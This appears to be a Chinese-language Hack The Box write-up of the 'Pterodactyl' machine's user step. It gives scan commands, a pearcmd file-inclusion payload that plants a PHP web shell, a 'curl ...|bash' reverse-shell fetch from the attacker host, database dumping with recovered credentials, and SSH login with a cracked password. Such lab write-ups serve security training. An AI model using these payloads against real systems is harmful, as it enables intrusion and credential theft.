HTB 赛季10 - Pterodactyl - user

10.129.16.212

nmap扫描

sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.16.212 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.16.212 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.16.212 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

!\[Pasted image 20260208171012.png]

http://pterodactyl.htb/changelog.txt

!\[Pasted image 20260208171809.png]

我们注意到其背后有一个存在RCE的Panel中间件。我们对Web应用进行枚举

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u http://pterodactyl.htb/FUZZ -e .php -mc all

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://pterodactyl.htb/ -H 'Host: FUZZ.pterodactyl.htb' -mc all -fw 18

!\[Pasted image 20260208172226.png]

!\[Pasted image 20260208172440.png]

我们了解到这个漏洞存在，经过大量尝试，我们发现该漏洞是一种php文件包含的变种，他包含了pearcmd后，导致了RCE。我的payload如下

/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=phpinfo()?>'+/tmp/info.php

!\[Pasted image 20260208183251.png]

/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=info

!\[Pasted image 20260208183309.png]

我们开始反连

/locales/locale.json?locale=../../../../../../../../../../usr/share/php/PEAR/&namespace=pearcmd&+config-create+/'<?=system($_GET["cmd"])?>'+/tmp/shell.php 

!\[Pasted image 20260208183354.png]

/locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=shell&cmd=curl+http://10.10.14.14/pwn|bash

!\[Pasted image 20260208183543.png]

!\[Pasted image 20260208183627.png]

上linpeas

wget http://10.10.14.14:81/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

!\[Pasted image 20260208184031.png]

喷洒密码，没有用

PteraPanel

wget http://10.10.14.14:81/pspy64 && chmod 755 pspy64 && ./pspy64

pterodactyl
PteraPanel

mysql -h127.0.0.1 -upterodactyl -pPteraPanel -e 'Show databases;use panel;show tables;Select * from users;Select username,password from users;'

!\[Pasted image 20260208190605.png]

!\[Pasted image 20260208191849.png]

ssh phileasfogg3@10.129.16.212 
!QAZ2wsx

!\[Pasted image 20260208191631.png]

我到这里发现了一封邮件并确认时使用udisk2的相关漏洞，但是我始终没能根据描述完成攻击。